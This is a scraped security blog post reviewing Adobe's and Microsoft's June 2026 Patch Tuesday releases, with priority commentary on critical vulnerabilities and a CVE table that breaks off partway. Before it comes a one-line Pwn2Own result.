                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7fd3253a-0a70-442c-a3c2-55bcf6ff5dbf/Image+%281%29.jpeg" data-image-dimensions="5184x3888" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7fd3253a-0a70-442c-a3c2-55bcf6ff5dbf/Image+%281%29.jpeg?format=1000w" width="5184" height="3888" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7fd3253a-0a70-442c-a3c2-55bcf6ff5dbf/Image+%281%29.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7fd3253a-0a70-442c-a3c2-55bcf6ff5dbf/Image+%281%29.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7fd3253a-0a70-442c-a3c2-55bcf6ff5dbf/Image+%281%29.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7fd3253a-0a70-442c-a3c2-55bcf6ff5dbf/Image+%281%29.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7fd3253a-0a70-442c-a3c2-55bcf6ff5dbf/Image+%281%29.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7fd3253a-0a70-442c-a3c2-55bcf6ff5dbf/Image+%281%29.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7fd3253a-0a70-442c-a3c2-55bcf6ff5dbf/Image+%281%29.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  













































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/c75b6dc6-21f3-4a69-98b3-1b3d62b8ffdd/Image.jpeg" data-image-dimensions="5184x3888" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/c75b6dc6-21f3-4a69-98b3-1b3d62b8ffdd/Image.jpeg?format=1000w" width="5184" height="3888" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/c75b6dc6-21f3-4a69-98b3-1b3d62b8ffdd/Image.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/c75b6dc6-21f3-4a69-98b3-1b3d62b8ffdd/Image.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/c75b6dc6-21f3-4a69-98b3-1b3d62b8ffdd/Image.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/c75b6dc6-21f3-4a69-98b3-1b3d62b8ffdd/Image.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/c75b6dc6-21f3-4a69-98b3-1b3d62b8ffdd/Image.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/c75b6dc6-21f3-4a69-98b3-1b3d62b8ffdd/Image.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/c75b6dc6-21f3-4a69-98b3-1b3d62b8ffdd/Image.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">SUCCESS</b> - Kentaro Kawane of GMO Cybersecurity by Ierae chained 2 Use-After-Free bugs to escalate privileges on Microsoft Windows 11 in the third round, earning $15,000 and 3 Master of Pwn points.</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3eeb476b-9c94-4aea-ab1a-5a3545d4cab1/image.png" data-image-dimensions="4162x3121" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3eeb476b-9c94-4aea-ab1a-5a3545d4cab1/image.png?format=1000w" width="4162" height="3121" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3eeb476b-9c94-4aea-ab1a-5a3545d4cab1/image.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3eeb476b-9c94-4aea-ab1a-5a3545d4cab1/image.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3eeb476b-9c94-4aea-ab1a-5a3545d4cab1/image.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3eeb476b-9c94-4aea-ab1a-5a3545d4cab1/image.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3eeb476b-9c94-4aea-ab1a-5a3545d4cab1/image.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3eeb476b-9c94-4aea-ab1a-5a3545d4cab1/image.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3eeb476b-9c94-4aea-ab1a-5a3545d4cab1/image.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>]]></content:encoded>
</item>
<item>
<title><![CDATA[The June 2026 Security Update Review]]></title>
<description><![CDATA[I’ve made it through Pwn2Own Berlin, had a little vacation, and now I’m back for Patch Tuesday. Microsoft and Adobe didn’t disappoint. In fact, they have heralded my return with the largest Patch Tuesday release ever. Thanks? Take a break from your regularly scheduled activities and let’s take a ...]]></description>
<link>https://tsecurity.de/de/3694563/hacking/the-june-2026-security-update-review/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694563/hacking/the-june-2026-security-update-review/</guid>
<pubDate>Sat, 25 Jul 2026 19:02:53 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class="">I’ve made it through Pwn2Own Berlin, had a little vacation, and now I’m back for Patch Tuesday. Microsoft and Adobe didn’t disappoint. In fact, they have heralded my return with the largest Patch Tuesday release ever. Thanks? Take a break from your regularly scheduled activities and let’s take a look at the latest security patches from Adobe and Microsoft. If you’d rather watch the full video recap covering the entire release, you can check it out here:</p>





















  
  




  
















  
    
      
    
    
      
        
      
    
    
    



  






  <p class=""><strong>Adobe Patches for June 2026</strong></p><p class="">For June, Adobe released 11 bulletins addressing 123 unique CVEs in Adobe Acrobat Reader, ColdFusion, Experience Manager, Experience Manager Forms, InDesign, InCopy, Substance 3D Sampler, Content Credentials SDK, Dreamweaver, Format Plugins, and Adobe Campaign Classic. A total of 11 of these CVEs were reported through the ZDI program.</p><p class="">Here’s this month’s overview table:</p>





















  
  




  


  
    


<table>
<colgroup>
  <col>
  <col>
  <col>
  <col>
  <col>
  <col>
  <col>
</colgroup>
<thead>
  <tr>
    <th>Bulletin ID</th>
    <th>Product</th>
    <th>CVE Count</th>
    <th>Highest Severity</th>
    <th>Highest CVSS</th>
    <th>Exploited</th>
    <th>Deployment Priority</th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/campaign/apsb26-66.html" target="_blank">APSB26-66</a></td>
    <td>Adobe Campaign Classic</td>
    <td>2</td>
    <td>Critical</td>
    <td>10.0</td>
    <td>No</td>
    <td>1</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/coldfusion/apsb26-64.html" target="_blank">APSB26-64</a></td>
    <td>Adobe ColdFusion</td>
    <td>7</td>
    <td>Critical</td>
    <td>9.6</td>
    <td>No</td>
    <td>1</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/acrobat/apsb26-63.html" target="_blank">APSB26-63</a></td>
    <td>Adobe Acrobat Reader</td>
    <td>20</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>2</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/aem-forms/apsb26-57.html" target="_blank">APSB26-57</a></td>
    <td>Adobe Experience Manager Forms</td>
    <td>3</td>
    <td>Critical</td>
    <td>9.3</td>
    <td>No</td>
    <td>2</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/dreamweaver/apsb26-62.html" target="_blank">APSB26-62</a></td>
    <td>Adobe Dreamweaver</td>
    <td>5</td>
    <td>Critical</td>
    <td>8.6</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/formatplugins/apsb26-65.html" target="_blank">APSB26-65</a></td>
    <td>Adobe Format Plugins</td>
    <td>2</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/incopy/apsb26-59.html" target="_blank">APSB26-59</a></td>
    <td>Adobe InCopy</td>
    <td>3</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/indesign/apsb26-58.html" target="_blank">APSB26-58</a></td>
    <td>Adobe InDesign</td>
    <td>12</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/substance3d-sampler/apsb26-60.html" target="_blank">APSB26-60</a></td>
    <td>Adobe Substance 3D Sampler</td>
    <td>4</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/content-authenticity-sdk/apsb26-61.html" target="_blank">APSB26-61</a></td>
    <td>Content Credentials SDK</td>
    <td>8</td>
    <td>Critical</td>
    <td>7.5</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/experience-manager/apsb26-56.html" target="_blank">APSB26-56</a></td>
    <td>Adobe Experience Manager</td>
    <td>57</td>
    <td>Important</td>
    <td>5.4</td>
    <td>No</td>
    <td>3</td>
  </tr>
</tbody>
<tfoot>
  <tr>
    <td>TOTAL</td>
    <td>11 bulletins</td>
    <td>123</td>
    <td></td>
    <td></td>
    <td></td>
    <td></td>
  </tr>
</tfoot>
</table>



  
  









  <p class="">Obviously, the update for Campaign Classic should be on the top of your deployment list if you’re a user. A CVSS 10 is rare; two in the same bulletin is pretty much a unicorn. Adobe says there are no active attacks, but I would expect heavy research into creating one. The update for Coldfusion is also a Priority 1, but again, no known attacks is the wild. I suspect the Reader patch will also receive a lot of attention as malicious PDFs are common in ransomware attacks. The update for Experience Manager may be large, but it’s mostly just cross-site scripting (XSS) bugs.</p><p class=""><strong>Microsoft Patches for June 2026</strong></p><p class="">This month, Microsoft released a new record 208 CVEs Windows and Windows components, Office and Office Components, Microsoft Edge (Chromium-based), Azure, .NET and Visual Studio, Github Copilot, Defender, Exchange Server, Hyper-V, Secure Boot, and BitLocker. At least, that’s my count. Microsoft’s tools seem to be having some issues, as they initially included a CVE from 2020 in this release. Regardless, the count is over 200, and I counted several times.</p><p class="">One of these bugs came through the ZDI program, but bugs submitted during Pwn2Own Berlin remain unpatched. If you include the Chromium and other third-party bugs, the total CVE count for June comes to a staggering 571 CVEs. 38 of these cases are rated Critical while the rest are rated Important in severity.</p><p class="">I’ve been counting CVEs on Patch Tuesday since 2017, and this is by far the largest monthly release in that time. The previous record was 177 set last year. It is extraordinary that Microsoft can produce so many patches in a single month, but it does raise concerns. How many of these cases were found using AI tools? How many patches were generated using AI to assist in coding or testing? What quality issues may exist in these patches? And likely most importantly, is this the new normal? The last two months were also large releases. Should sysadmins adjust their processes for prioritization and patch deployment based on this new volume of updates? Unfortunately, Microsoft is not providing those answers right now. Hopefully that changes in the future. BTW – just a note – the current number of CVEs shipped by Microsoft this year exceeds the total number of CVEs shipped in all of 2018.</p><p class="">One of the bugs patched by Microsoft this month is listed as under active exploitation and three others are listed as publicly known at the time of release. Let’s take a closer look at some of the more interesting updates for this month, starting with the bug being exploited in the wild.</p><p class="">-   <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41091"><strong>CVE-2026-41091</strong></a><strong> - Microsoft Defender Elevation of Privilege Vulnerability<br></strong>Since Microsoft doesn’t provide info on how widespread exploitation is, we must read some tea leaves. For this patch, several different people were acknowledged, which indicates multiple parties say this is in the wild, meaning exploitation is likely significant. The good news is that most people won’t need to take action as Defender updates itself. However, if you don’t have this configured or are in an isolated environment, you’ll need to update to the latest version.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45657"><strong>CVE-2026-45657</strong></a><strong> - Windows Kernel Remote Code Execution Vulnerability<br></strong>This CVSS 9.8 bug allows remote, unauthenticated attackers to execute code at SYSTEM level without user interaction. Yup – this is wormable. The problem lies in the way the kernel handles TCP/IP. This was listed as “Exploitation Less Likely” by Microsoft, but rest assured that every researcher and bug shop on the planet is reversing this patch right now trying to create an exploit. Test and deploy this patch quickly.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47291"><strong>CVE-2026-47291</strong></a><strong> - HTTP.sys Remote Code Execution Vulnerability<br></strong>Our second CVSS 9.8 bug of the month, this also allows remote, unauthenticated attackers to execute code on affected systems without user interaction. However, there is a caveat. Systems using the default MaxRequestBytes registry value used by the Windows HTTP stack are not affected by this bug. You can edit your registry settings if you need protection while you test and deploy the patch. The bulletin includes instructions and even a PowerShell script for doing this action. Microsoft lists this as “Exploitation more likely”, so I would definitely check your registry settings.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44815"><strong>CVE-2026-44815</strong></a><strong> - DHCP Client Service Remote Code Execution Vulnerability<br></strong>Here’s another CVSS 9.8 that has an odd incongruity. Although the CVSS says no permissions are required for exploitation, the write-up states it must be an “authenticated” user. I would err on the side of caution here and believe the CVSS. If that’s correct, then we have another bug where a remote, unauthenticated attacker could execute code on affected systems without user interaction. And since the DHCP client is on every OS, it’s a juicy target. This is another one to test and deploy with haste.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45585"><strong>CVE-2026-45585</strong></a><strong>/</strong><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50507"><strong>CVE-2026-50507</strong></a><strong> - Windows BitLocker Security Feature Bypass Vulnerability<br></strong>If you’ve followed the ongoing saga of Nightmare Eclipse vs. MSRC, the bugs should look familiar. One is definitely a fix for “YellowKey”, while the other appears to be a fix for “GreenPlasma”. The researcher has promised a “<a href="https://www.theregister.com/security/2026/05/28/microsoft-0-day-feud-escalates-as-researcher-threatens-another-windows-exploit-dump/5248085">bone shattering</a>” drop on June 14, so let’s hope Microsoft is able to reach some understanding with the researcher before more 0-days are released. Also, there is a script provided by Microsoft as a mitigation, but the better strategy is to test and deploy the updates.</p><p class=""> Here’s the full list of CVEs released by Microsoft for June 2026:</p>





















  
  




  


  
    





<link rel="File-List" href="new2026-Jun-cvrf2.fld/filelist.xml">













<table border="0" cellpadding="0" cellspacing="0" width="1024">
 <col width="144">
 <col width="256">
 <col width="104" span="6">
 <tr height="47">
  <td width="144" class="xl65" height="47">CVE</td>
  <td width="256" class="xl65">Title</td>
  <td width="104" class="xl66">Severity</td>
  <td width="104" class="xl66">CVSS</td>
  <td width="104" class="xl66">Public</td>
  <td width="104" class="xl66">Exploited</td>
  <td width="104" class="xl66">XI</td>
  <td width="104" class="xl66">Type</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41091"><span>CVE-2026-41091</span></a></td>
  <td width="256" class="xl68">Microsoft Defender
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl71">Yes</td>
  <td class="xl71">Yes</td>
  <td class="xl70">0</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49160"><span>CVE-2026-49160</span></a></td>
  <td width="256" class="xl68">HTTP.sys Denial of
  Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl71">Yes</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50507"><span>CVE-2026-50507</span></a></td>
  <td width="256" class="xl68">Windows BitLocker
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.8</td>
  <td class="xl71">Yes</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45586"><span>CVE-2026-45586</span></a></td>
  <td width="256" class="xl68">Windows Collaborative
  Translation Framework (CTFMON) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl71">Yes</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="91">
  <td class="xl67" height="91"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-10263"><span>CVE-2025-10263 *</span></a></td>
  <td width="256" class="xl68">ARM: CVE-2025-10263
  Completion of affected memory accesses might not be guaranteed by completion
  of a TLBI [kernel]</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48567"><span>CVE-2026-48567</span></a></td>
  <td width="256" class="xl68">Azure HorizonDB<span>  </span>Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">10</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">N/A</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32193"><span>CVE-2026-32193</span></a></td>
  <td width="256" class="xl68">Azure Kubernetes
  Service (AKS) Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47644"><span>CVE-2026-47644</span></a></td>
  <td width="256" class="xl68">Copilot Chat
  (Microsoft Edge) Information Disclosure Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44815"><span>CVE-2026-44815</span></a></td>
  <td width="256" class="xl68">DHCP Client Service
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47291"><span>CVE-2026-47291</span></a></td>
  <td width="256" class="xl68">HTTP.sys Remote Code
  Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42824"><span>CVE-2026-42824</span></a></td>
  <td width="256" class="xl68">M365 Copilot
  Information Disclosure Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">N/A</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45476"><span>CVE-2026-45476</span></a></td>
  <td width="256" class="xl68">Microsoft Azure
  Network Adapter Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.2</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44810"><span>CVE-2026-44810</span></a></td>
  <td width="256" class="xl68">Microsoft
  Cryptographic Services Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48579"><span>CVE-2026-48579</span></a></td>
  <td width="256" class="xl68">Microsoft Exchange
  Online Information Disclosure Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">N/A</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47655"><span>CVE-2026-47655</span></a></td>
  <td width="256" class="xl68">Microsoft Graph
  Information Disclosure Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">N/A</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45497"><span>CVE-2026-45497</span></a></td>
  <td width="256" class="xl68">Microsoft M365 Copilot
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">N/A</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45460"><span>CVE-2026-45460</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Information Disclosure Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">4.7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45472"><span>CVE-2026-45472</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45474"><span>CVE-2026-45474</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45461"><span>CVE-2026-45461</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45463"><span>CVE-2026-45463</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45456"><span>CVE-2026-45456</span></a></td>
  <td width="256" class="xl68">Microsoft Outlook and
  Word Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45458"><span>CVE-2026-45458</span></a></td>
  <td width="256" class="xl68">Microsoft Outlook and
  Word Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47635"><span>CVE-2026-47635</span></a></td>
  <td width="256" class="xl68">Microsoft Outlook and
  Word Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26142"><span>CVE-2026-26142</span></a></td>
  <td width="256" class="xl68">Nuance PowerScribe
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47289"><span>CVE-2026-47289</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47654"><span>CVE-2026-47654</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48563"><span>CVE-2026-48563</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42992"><span>CVE-2026-42992</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44799"><span>CVE-2026-44799</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
